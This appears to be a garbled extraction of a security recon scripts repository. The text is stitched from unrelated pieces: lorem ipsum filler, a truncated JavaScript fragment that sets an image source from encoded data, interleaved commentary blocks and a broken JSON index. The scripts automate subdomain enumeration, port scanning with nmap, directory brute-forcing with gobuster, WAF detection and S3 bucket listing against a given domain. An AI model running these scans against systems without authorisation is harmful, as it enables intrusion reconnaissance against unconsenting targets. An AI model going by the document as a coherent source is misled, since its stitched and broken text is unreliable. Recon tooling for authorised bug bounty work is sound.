Phasellus vel bibendum mi. Nam hendrerit justo eget massa lobortis sodales. Morbi nec ligula sem. Nullam felis nibh, tempor lobortis leo eu, vehicula ornare libero. Vestibulum lorem sapien, rhoncus nec ante nec, dignissim tincidunt urna. Sed rutrum tellus at nisl fringilla semper. Duis pharetra dui turpis, sed pellentesque magna porttitor vitae. Phasellus pharetra justo eu lectus ullamcorper, ut mollis lectus dictum. Duis efficitur tellus sed ante semper, eget iaculis nunc iaculis. Suspendisse tristique non ante ac lobortis.\
Phasellus auctor lectus nibh, non vulputate sem tristique sit amet. Pellentesque fringilla dolor vitae dapibus porta. Vivamus nec neque ante. In commodo neque ut turpis feugiat tempor. Duis pulvinar enim imperdiet condimentum iaculis. Maecenas ac pellentesque erat. Sed tempor a turpis eu eleifend. Cras elit nibh, aliquam ac sapien vulputate, accumsan rhoncus nunc. Nulla ut porta arcu. Sed imperdiet luctus sapien, eu viverra est lacinia in. Curabitur volutpat, enim nec hendrerit malesuada, felis libero facilisis enim, vitae tincidunt felis libero nec tortor. Sed lorem tellus, fringilla lobortis pharetra vitae, dignissim ac nibh. Curabitur eu ultricies mi. Aliquam erat volutpat. Aenean tincidunt diam quis hendrerit euismod. Etiam sed nibh eu est dignissim ultricies.\
Sed cursus felis eu tellus sollicitudin, a luctus lacus tempor. Aenean elit est, vulputate vitae commodo et, pellentesque vitae dui. Etiam volutpat accumsan congue. Mauris maximus at lorem nec auctor. Vestibulum porta magna et suscipit faucibus. Vestibulum sit amet neque ligula. In hac habitasse platea dictumst. Nullam sed tortor congue, volutpat lectus sit amet, convallis ante.\
Phasellus vel bibendum mi. Nam hendrerit justo eget massa lobortis sodales. Morbi nec ligula sem. Nullam felis nibh, tempor lobortis leo eu, vehicula ornare libero. Vestibulum lorem sapien, rhoncus nec ante nec, dignissim tincidunt urna. Sed rutrum tellus at nisl fringilla semper. Duis pharetra dui turpis, sed pellentesque magna porttitor vitae. Phasellus pharetra justo eu lectus ullamcorper, ut mollis lectus dictum. Duis efficitur tellus sed ante semper, eget iaculis nunc iaculis. Suspendisse tristique non ante ac lobortis.\
Phasellus auctor lectus nibh, non vulputate sem tristique sit amet. Pellentesque fringilla dolor vitae dapibus porta. Vivamus nec neque ante. In commodo neque ut turpis feugiat tempor. Duis pulvinar enim imperdiet condimentum iaculis. Maecenas ac pellentesque erat. Sed tempor a turpis eu eleifend. Cras elit nibh, aliquam ac sapien vulputate, accumsan rhoncus nunc. Nulla ut porta arcu. Sed imperdiet luctus sapien, eu viverra est lacinia in. Curabitur volutpat, enim nec hendrerit malesuada, felis libero facilisis enim, vitae tincidunt felis libero nec tortor. Sed lorem tellus, fringilla lobortis pharetra vitae, dignissim ac nibh. Curabitur eu ultricies mi. Aliquam erat volutpat. Aenean tincidunt diam quis hendrerit euismod. Etiam sed nibh eu est dignissim ultricies.\
Sed cursus felis eu tellus sollicitudin, a luctus lacus tempor. Aenean elit est, vulputate vitae commodo et, pellentesque vitae dui. Etiam volutpat accumsan congue. Mauris maximus at lorem nec auctor. Vestibulum porta magna et suscipit faucibus. Vestibulum sit amet neque ligula. In hac habitasse platea dictumst. Nullam sed tortor congue, volutpat lectus sit amet, convallis ante.\
Vestibulum tincidunt diam vel diam semper posuere. Nulla facilisi. Curabitur a facilisis lorem, eu porta leo. Sed pharetra eros et malesuada mattis. Donec tincidunt elementum mauris quis commodo. Donec nec vulputate nulla. Nunc luctus orci lacinia nunc sodales, vitae cursus quam tempor. Cras ullamcorper ullamcorper urna vitae pulvinar. Curabitur ac pretium felis. Vivamus vel scelerisque nisi. Pellentesque lacinia consequat nibh, vitae rhoncus tellus faucibus eget. Ut pulvinar est non tellus tristique sodales. Aenean eget velit non turpis tristique pretium id eu dolor. Nulla sed eros quis urna facilisis scelerisque. Nam orci neque, finibus eget odio et, elementum finibus erat.*/";
img.src = encode(stringenc), b.innerHTML = "", b.appendChild(img)
})();
================================================
FILE: scripts/recon.zsh
================================================
#!/usr/bin/env zsh
#continue on errors
set +e
autoload colors; colors
__info() echo "$fg[blue][*] $@ $reset_color"
__ok() echo "$fg[green] [+] $@ $reset_color"
__warn() echo "$fg[yellow][>] $@ $reset_color"
__err() echo "$fg[red][!] $@ $reset_color"
#############################################################
# Recon
#############################################################
# exit non-zero on a missing argument so a wrapper script can detect the failure
usage() { __err "Missing argument.\nUsage: zsh $0 <domain> <org> <outdir>"; exit 1; }
[[ -z $1 ]] && usage
[[ -z $2 ]] && usage
[[ -z $3 ]] && usage
export DOMAIN=$1
export ORG=$2
export DIR=$3
# the output directory must exist before the first file (asn.txt) is written into it
mkdir -p ${DIR}
export UA="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
export F_ASN="${DIR}/asn.txt"
export F_CIDR="${DIR}/cidr.txt"
export F_SUBS="${DIR}/subs.txt"
export F_SUBS_RES="${DIR}/subs.resolved.txt"
export F_HOSTS="${DIR}/hostnames.txt"
export F_HOSTS_IP="${DIR}/hostips.txt"
export F_WEB="${DIR}/urls.txt"
export PORTS="21,22,25,80,443,135-139,445,3389,3306,1433,389,636,88,111,2049,1521,110,143,161,6379,5900,2222,4443,8000,8888,8080,9200"
#############################################################
# Startup
#############################################################
__info "Recon.zsh running... "
__info "Domain: ${DOMAIN} Org: ${ORG}"
__info "Using current directory for output: ${DIR}"
#############################################################
# Steps
#############################################################
org() {
__ok "metagoofil'ing files"
mkdir -p ${DIR}/files
metagoofil -u "${UA}" -d ${DOMAIN} -t pdf,doc,docx,ppt,pptx,xls,xlsx -w -l 100 -n 50 -o ${DIR}/files > /dev/null 2>&1 &
}
network() {
__ok "Amass'ing ASNs"
amass intel -org "${ORG}" | cut -d, -f1 > ${F_ASN}
__ok "BGPview'ing CIDRs"
# start from an empty CIDR list; each ASN's prefixes are appended below
: > ${F_CIDR}
for asn in $(cat ${F_ASN})
do
if [[ ! -z ${asn} ]]
then
# append rather than overwrite: with '>' only the last ASN's prefixes survived the loop
curl -s https://api.bgpview.io/asn/${asn}/prefixes | jq -r '.data | .ipv4_prefixes | .[].prefix' >> ${F_CIDR}
fi
done
__ok "dnsrecon'ing PTRs"
network_dnsrecon
#__ok "masscan'ing CIDRs"
#network_masscan
}
network_dnsrecon() {
mkdir -p ${DIR}/ptr
for cidr in $(cat ${F_CIDR})
do
if [[ ! -z ${cidr} ]]
then
local net=$(echo ${cidr} | cut -d/ -f1)
dnsrecon -d ${DOMAIN} -r ${cidr} -n 1.1.1.1 -c ${DIR}/ptr/ptr.${net}.csv > /dev/null 2>&1
fi
done
}
network_masscan() {
mkdir -p ${DIR}/net
for cidr in $(cat ${F_CIDR})
do
if [[ ! -z ${cidr} ]]
then
local net=$(echo ${cidr} | cut -d/ -f1)
sudo masscan ${cidr} -p${PORTS} -oL ${DIR}/net/masscan.${net}.txt > /dev/null 2>&1
fi
done
}
domains() {
echo "${DOMAIN}" > ${DIR}/domains.txt
__ok "Subfinder'ing "
# stdout appends to the subdomain list; only stderr is discarded. Writing
# '>> file > /dev/null 2>&1' under zsh MULTIOS copies stderr into the file as well.
subfinder -d ${DOMAIN} -nW -silent >> ${F_SUBS} 2> /dev/null
__ok "crt.sh'ing "
# double quotes so ${DOMAIN} expands; the single-quoted URL sent the literal text "$DOMAIN" to crt.sh
curl -s "https://crt.sh/?q=%.${DOMAIN}" | grep -i "${DOMAIN}" | cut -d '>' -f2 | cut -d '<' -f1 | grep -v " " | sort -u >> ${F_SUBS} 2> /dev/null
__ok "waybackurls'ing... "
echo ${DOMAIN} | waybackurls | cut -d "/" -f3 | sort -u | grep -v ":80" >> ${F_SUBS} 2> /dev/null
__ok "sorting results "
# sort reads the whole input before opening -o, so in-place deduplication is safe
sort -u -o ${F_SUBS} ${F_SUBS}
}
lookups() {
__ok "massdns'ing domains"
/opt/recon/massdns/bin/massdns -r /opt/recon/massdns/lists/resolvers.txt -t A -o S ${F_SUBS} -w ${F_SUBS_RES} > /dev/null 2>&1
__ok "extracting resolved hostnames"
# the hostname is the text before the record type ("name. A addr" / "name. CNAME target."); only stderr is discarded
sed 's/A.*//' ${F_SUBS_RES} | sed 's/CN.*//' | sed 's/\..$//' | sort -u >> ${F_HOSTS} 2> /dev/null
__ok "extracting resolved IP addresses"
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' ${F_SUBS_RES} | sort -u | sort -V -o ${F_HOSTS_IP} 2> /dev/null
}
scans() {
__ok "scanning host IP's"
mkdir -p ${DIR}/hosts
for h in $(cat ${F_HOSTS_IP})
do
__ok "...scanning ${h}"
mkdir -p ${DIR}/hosts/${h}
nmap -sT -p ${PORTS} -T4 --open ${h} -oA ${DIR}/hosts/${h}/scan > /dev/null 2>&1
done
}
web() {
__ok "httprobing resolved hosts"
# stdout appends to the URL list; only stderr is discarded (zsh MULTIOS would otherwise copy stderr into the file)
cat ${F_HOSTS} | httprobe -t 3000 -s -p https:443 | sed 's/....$//' >> ${F_WEB} 2> /dev/null
mkdir -p ${DIR}/web
for url in $(cat ${F_WEB})
do
__ok "...enumerating ${url} ... "
local host=$(echo ${url} | cut -d/ -f3)
local hdir=${DIR}/web/${host}
mkdir -p ${hdir}
__ok "Getting IP address"
host ${host} > ${hdir}/ip.txt 2> /dev/null
__ok "Curling robots.txt"
curl -s -L ${url}/robots.txt -o ${hdir}/robots.txt > /dev/null 2>&1
__ok "Whatwebbing"
whatweb ${url} -a 1 > ${hdir}/whatweb.txt 2> /dev/null
__ok "Wafw00fing"
wafw00f ${url} > ${hdir}/waf.txt 2> /dev/null
__ok "Gobustering"
gobuster dir -q -z -u ${url} -w /usr/share/seclists/Discovery/Web-Content/common.txt -t10 -k -o ${hdir}/gobuster.txt > /dev/null 2>&1
__ok "S3 Bucketing"
# write into the per-host directory; previously s3.txt landed in the current working directory
aws s3 ls s3://${host} > ${hdir}/s3.txt 2> /dev/null
done
}
#############################################################
# Workflow
#############################################################
__info "Searching for Org OSINT... "
org
__info "Mapping Network... "
network
__info "Collecting sub-domains..."
domains
__info "Resolving sub-domains... "
lookups
__info "Scanning IP addresses..."
scans
__info "Probing web servers..."
web
__info "Checking job completion..."
wait $(jobs -p)
__info "Recon completed"
echo " "
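The lookups() step in recon.zsh pulls hostnames and addresses out of massdns simple output (`-o S`) with a chain of sed substitutions that cuts at the first capital `A` or `CN` in the line. The block below is an added example, not part of quiver or recon.zsh, that does the same extraction on massdns's whitespace-separated fields so the record type is matched exactly, and that keeps IPv4 answers only in the address list. The massdns sample is constructed, and the names `massdns_hosts`, `massdns_ips`, `hosts_from_sample` and `ips_from_sample` are mine.

```shell
#!/usr/bin/env bash
# Added example (not quiver's code): field-aware parsing of massdns "-o S"
# output, which prints one "name. TYPE value" line per answer.
set -eu

# Constructed sample of massdns simple output (not real resolver data).
SAMPLE_MASSDNS='www.example.com. A 203.0.113.10
api.example.com. CNAME edge.example.net.
edge.example.net. A 203.0.113.20
mail.example.com. A 203.0.113.10
ipv6.example.com. AAAA 2001:db8::1'

# Names that answered with an A, AAAA or CNAME record, trailing dot removed,
# deduplicated. Matching on $2 means a hostname is never cut short because
# it happens to contain the letters of a record type.
massdns_hosts() {
  awk '$2 ~ /^(A|AAAA|CNAME)$/ { sub(/\.$/, "", $1); print $1 }' | sort -u
}

# IPv4 addresses from A records only (AAAA and CNAME values are skipped),
# deduplicated and ordered numerically octet by octet.
massdns_ips() {
  awk '$2 == "A" { print $3 }' | sort -u | sort -t. -k1,1n -k2,2n -k3,3n -k4,4n
}

# Convenience wrappers that run the parsers over the constructed sample.
hosts_from_sample() { printf '%s\n' "$SAMPLE_MASSDNS" | massdns_hosts; }
ips_from_sample()   { printf '%s\n' "$SAMPLE_MASSDNS" | massdns_ips; }

# Stand-alone run: print both lists.
hosts_from_sample
ips_from_sample
```

Used in place of the sed chain: `massdns_hosts < ${F_SUBS_RES} >> ${F_HOSTS}` and `massdns_ips < ${F_SUBS_RES} > ${F_HOSTS_IP}`. Only awk and sort are involved, so the functions behave the same under zsh and bash.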
================================================
FILE: scripts/webrecon.zsh
================================================
#!/usr/bin/env zsh
# usage: zsh webrecon.zsh <file with one URL per line>
# without an argument, "cat $1" below would block reading stdin
[[ -z $1 ]] && { echo "[!] Missing argument. Usage: zsh $0 <url list>"; exit 1; }
red=`tput setaf 1`
green=`tput setaf 2`
yellow=`tput setaf 3`
reset=`tput sgr0`
echo -e "[*] webrecon.zsh "
echo -e "[*] source: $1"
echo -e " "
for url in $(cat $1);do
echo -e "[*] Enumerating ${url}"
############################################################
# Make directory
############################################################
host=$(echo $url | cut -d "/" -f3)
echo -e "${green} [+] Making directory ${host} ${reset}"
mkdir -p ${host}
############################################################
# Host
############################################################
echo -e "${green} [+] Getting IP address... ${reset}"
host ${host} | tee ${host}/ip.txt > /dev/null
############################################################
# Robots
############################################################
echo -e "${green} [+] Curling... robots.txt ${reset}"
curl -s -L ${url}/robots.txt -o ${host}/robots.txt
############################################################
# Ports
############################################################
echo -e "${green} [+] Nmapping... ${reset}"
nmap -sT --top-ports 100 --open ${host} -oA ${host}/ports > /dev/null
############################################################
# Whatweb
############################################################
echo -e "${green} [+] Whatwebbing... ${reset}"
whatweb ${url} -a 1 > ${host}/whatweb.txt 2> /dev/null
############################################################
# Wafw00f
############################################################
echo -e "${green} [+] Wafw00fing... ${reset}"
wafw00f ${url} > ${host}/waf.txt 2> /dev/null
############################################################
# Gobuster
############################################################
echo -e "${green} [+] Gobustering... ${reset}"
gobuster dir -q -z -u ${url} -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt -k -o ${host}/gobuster-dirs.txt 2> /dev/null
############################################################
# Eyewitness
############################################################
#echo -e "${green} [+] Screenshotting... ${reset}"
#eyewitness --web --single ${url} -d ./${host}/screens --no-prompt &> /dev/null
############################################################
# AWS
############################################################
echo -e "${green} [+] S3 Bucketing... ${reset}"
# write into the per-host directory like the other results; previously s3.txt landed in the current directory
aws s3 ls s3://${host} > ${host}/s3.txt 2> /dev/null
echo -e " "
done
echo -e " "
echo -e "[*] Done"
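Both recon.zsh and webrecon.zsh derive the per-host directory name and the argument for `host` and `nmap` with `cut -d "/" -f3`, which leaves a port (`host:8443`) or userinfo attached to the hostname. The following is an added example, not from the quiver project, that splits a URL into hostname and port with shell parameter expansion alone; the sample URLs are constructed and `url_host`, `url_port` and `url_dirname` are names I chose.

```shell
#!/usr/bin/env bash
# Added example (not quiver's code): URL -> host / port without external tools.
set -eu

# url_host URL  -> hostname with scheme, userinfo, port and path removed
url_host() {
  local rest=${1#*://}      # drop "scheme://" (no-op when there is no scheme)
  rest=${rest%%/*}          # drop the path
  rest=${rest##*@}          # drop "user:pass@" if present
  rest=${rest%%:*}          # drop ":port"
  printf '%s\n' "$rest"
}

# url_port URL  -> explicit port, or the scheme default (443 for https, else 80)
url_port() {
  local scheme=${1%%://*}
  local rest=${1#*://}
  rest=${rest%%/*}
  rest=${rest##*@}
  case $rest in
    *:*) printf '%s\n' "${rest##*:}" ;;
    *)   if [ "$scheme" = https ]; then echo 443; else echo 80; fi ;;
  esac
}

# url_dirname URL -> "host_port", safe to use as a per-target directory name
# (a colon in "host:8443" is legal on Linux but confuses tools and other OSes)
url_dirname() {
  printf '%s_%s\n' "$(url_host "$1")" "$(url_port "$1")"
}

# Stand-alone run over constructed sample URLs.
for u in 'https://www.example.com:8443/login' 'http://example.com' 'https://user:pw@api.example.net/v1'; do
  printf '%s -> host=%s port=%s dir=%s\n' "$u" "$(url_host "$u")" "$(url_port "$u")" "$(url_dirname "$u")"
done
```

Bracketed IPv6 literals such as `https://[2001:db8::1]/` are not handled, and a URL with no scheme is treated as plain http.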
================================================
FILE: scripts/wildcards.py
================================================
#!/usr/bin/env python3
# coding=utf-8
# *******************************************************************
# *** Wildcards ***
# * Description:
# A script that does recon on public bug bounty wildcard domains.
# * Version:
# v0.1
# * Homepage:
# https://github.com/stevemcilwain/wildcards
# * Author:
# Steve Mcilwain
# *******************************************************************
# Modules
import sys
import requests
import os
# Configuration
WILDCARDS_URL = "https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/wildcards.txt"
WILDCARDS_FILE = "wildcards.txt"
# Colors
def print_red(skk): print("\033[91m{}\033[00m" .format(skk))
def print_cyan(skk): print("\033[96m{}\033[00m" .format(skk))
def print_yellow(skk): print("\033[93m{}\033[00m" .format(skk))
# Workflow
def download_file_from_url(url, file):
    # Fetch the wildcard list; the timeout keeps a stalled connection from
    # hanging an unattended (cron) run indefinitely.
    r = requests.get(url, allow_redirects=True, timeout=30)
    if r.status_code == 200:
        with open(file, "wb") as f:
            f.write(r.content)
        return (True, r.status_code)
    return (False, r.status_code)


def read_domains_from_file(file):
    # Collect the root domain of every "*.example.com" scope entry, dropping
    # the "*." prefix; strip() also removes CRLF line endings.
    domains = set()
    with open(file, "r") as f:
        for line in f:
            line = line.strip()
            if line.startswith("*."):
                domains.add(line[2:])
    return (len(domains) > 0, domains)


def main():
    print(" ")
    print_cyan("Wildcards")
    print(" ")
    print_cyan("[INFO] Roundin 'em up!")
    ok, status = download_file_from_url(WILDCARDS_URL, WILDCARDS_FILE)
    if not ok:
        sys.exit("[ERR] Failed to download file: {}".format(status))
    print("[INFO] Wrangled into: {}".format(WILDCARDS_FILE))
    ok, domains = read_domains_from_file(WILDCARDS_FILE)
    if not ok:
        sys.exit("[ERR] No wildcard domains found in {}".format(WILDCARDS_FILE))
    print("[INFO] {} wildcard root domains".format(len(domains)))
    #for domain in sorted(domains):
    #    print("Domain: " + domain)


if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print('\nKeyboardInterrupt Detected.')
        print('\nExiting...')
        sys.exit(0)
================================================
FILE: scripts/wildcards.sh
================================================
#!/usr/bin/env bash
#############################################################
# wildcards.sh
#
# This script is intended to run on a VPS as a cron job.
# Run it nightly and it will report any newly discovered sub domains
# from the list of root domains that use wildcard scope.
#############################################################
# Set an environment variable in your .bashrc for your Slack webhook
# export __WILDCARDS_SLACK="https://hooks.slack.com/services/<webhook>"
# The webhook can also be passed as the second argument, which takes
# precedence. Note that cron does not read .bashrc, so a cron entry
# should pass the webhook explicitly as shown below.
# Setup cron to run at a certain hour every night, example below at 2 am
# crontab -e
# m h dom mon dow command
# 0 2 * * * /bin/bash /path/to/wildcards.sh <domain> <webhook url>
DOMAIN=$1
SLACK=${2:-$__WILDCARDS_SLACK}
if [[ -z "$DOMAIN" ]]
then
echo "[x] Missing domain"
exit 1
fi
if [[ -z "$SLACK" ]]
then
echo "[x] Missing Slack webhook (pass it as argument 2 or set __WILDCARDS_SLACK)"
exit 1
fi
echo $(date) >> log.txt
echo "$DOMAIN" >> log.txt
# the webhook URL is a credential (anyone holding it can post to the channel), so it is not written to the log
curl -X POST --data-urlencode payload="{\"text\": \"Wildcards starting for $DOMAIN \"}" "$SLACK"
amass enum -active -ip -d "$DOMAIN"
DIFF=$(amass track -d "$DOMAIN" -last 2 | grep Found | awk '{print $2}')
echo "Diff: $DIFF" >> log.txt
if [[ ! -z "$DIFF" ]]
then
curl -X POST --data-urlencode payload="{\"text\": \"$DIFF\"}" "$SLACK"
fi
curl -X POST --data-urlencode payload="{\"text\": \"Wildcards completed for $DOMAIN \"}" "$SLACK"
================================================
FILE: system/hidpi.sh
================================================
#!/usr/bin/env bash
xfconf-query -c xfwm4 -p /general/theme -s Kali-Dark-xHiDPI
xfconf-query -c xsettings -p /Gdk/WindowScalingFactor -n -t 'int' -s 2
cat <<- EOF >> ~/.xsessionrc
export QT_SCALE_FACTOR=2
export XCURSOR_SIZE=48
export GDK_SCALE=2
EOF
[
},
{
"path": "scripts/wildcards.py",
"chars": 2125,
"preview": "#!/usr/bin/env python3\n# coding=utf-8\n\n# *******************************************************************\n# *** Wildc"
},
{
"path": "scripts/wildcards.sh",
"chars": 1276,
"preview": "#!/usr/bin/env bash\n\n#############################################################\n# wildcards.sh\n#\n# This script is int"
},
{
"path": "system/hidpi.sh",
"chars": 254,
"preview": "#!/usr/bin/env bash\n\nxfconf-query -c xfwm4 -p /general/theme -s Kali-Dark-xHiDPI\nxfconf-query -c xsettings -p /Gdk/Windo"
}
]
About this extraction
This page contains the full source code of the stevemcilwain/quiver GitHub repository, extracted and formatted as plain text. The extraction includes 76 files (179.8 KB), approximately 56.5k tokens, and a symbol index with 8 extracted functions, classes, methods, constants, and types.
Extracted by GitExtract. Built by Nikandr Surkov.